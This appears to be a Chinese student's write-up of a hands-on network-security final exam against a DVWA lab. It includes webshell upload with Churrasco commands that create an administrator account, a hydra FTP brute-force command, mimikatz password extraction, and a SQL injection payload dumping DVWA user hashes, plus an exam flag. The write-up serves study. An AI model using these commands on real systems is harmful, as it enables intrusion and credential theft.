网络攻防期末考（实战）

0x01 题目

题目

0x02 操作

讲真的想不到老师这么皮老师给的环境是dvwa的然后我一看是dvwa的，就以为直接按dvwa的那些来做就行，就没有信息收集。。。。。然鹅，我方了，最后才知道老师有另一个网站，去拿那个网站才能拿服务器，拿dvwa的根本弄不到服务器（方的一匹，老师太皮了，竟然有彩蛋）

1.以“学号”命名在“目标服务器”建立一个超级管理员权限的账号；

我先上传了个马然后菜刀连接
上传到c:\dvwa路径下cmd.exe Churrasco.exe
我预期的是这样的
设置终端路径setp c:\dvwa\cmd.exe
然后建账号 Churrasco “net user 2016014050 chenie /add”
加管理员组 Churrasco “net localgroup administrator 2016014050 /add”
but。。。。。。

建账户失败

事实是这样的。。。。什么都不能做 whoami都用不了
我然后尝试了各种姿势依然。。。。拿不下服务器Emmmmmmm
后来考完试才知道还有一个网站，必须找到那个站，拿下它，才能拿服务器（我已经哭晕在厕所了，没有做信息收集的后果）
这算是一个彩蛋吧，然而却没有一个人发现这个彩蛋
然后换个思路，既然是dvwa，可以用命令执行，然后建账户，加管理员组

2.获取FTP账号(admin)的密码(2000-3000的数字),并获取文件的内容；

拿ftp的密码，拿hydra爆破ftp的密码
首先根据题目做一个字典（2000-3000）的纯数字密码，可以写脚本生成字典，骚的是也可以用excel去生成一个纯数字的密码。
然后开始用hydra进行ftp爆破

hydra 192.168.2.3 ftp -l admin -P password.txt -t 50 -vV

对了，这里一不小心初心了，当是看administrator看多了，第一次跑的时候账户名用的administrator，然后没跑出来才发现是admin，真尴尬（心太粗了，这要是实战我就凉了）

爆破ftp

ftp账号admin 密码2688
然后登陆进去，有个txt文件，载下来

登陆ftp

拿到文件内容
HEBTUflag{76c1fd57258f3036ec1893fb48ae9195}

3.破解目标服务器中的Administrator账号的密码；

上传工具mimikatz，然后通过第一题建立的管理员权限账户，管理员身份运行mimikatz，然后获取管理员的密码

4.列举出其它DVWA中所有用户名和密码，以明文显示；(admin:password)

利用SQL注入获取dvwa的所有用户名和密码

 1' union select group_concat(user,':',password),2 from users#

sql注入

获得的用户名和密码
admin:5f4dcc3b5aa765d61d8327deb882cf99,
infor2:432f45b44c432414d2f97df0e5743818,
security2:ef06bfe41161fb7c8cc288ec519a5c73,
xjxy2:d3ced152c98e10d7e2835308a72ec585,
lisi:133ff1e10a8b244767ef734fb86f37fd
解md5
（老师让明文显示，我不太清楚可不可以注入时就用命令解密，然后我是一个个解密的）
admin:password
infor2:12345678910
security2:5845211314
xjxy2:yahoo.com.cn
lisi:buzhidao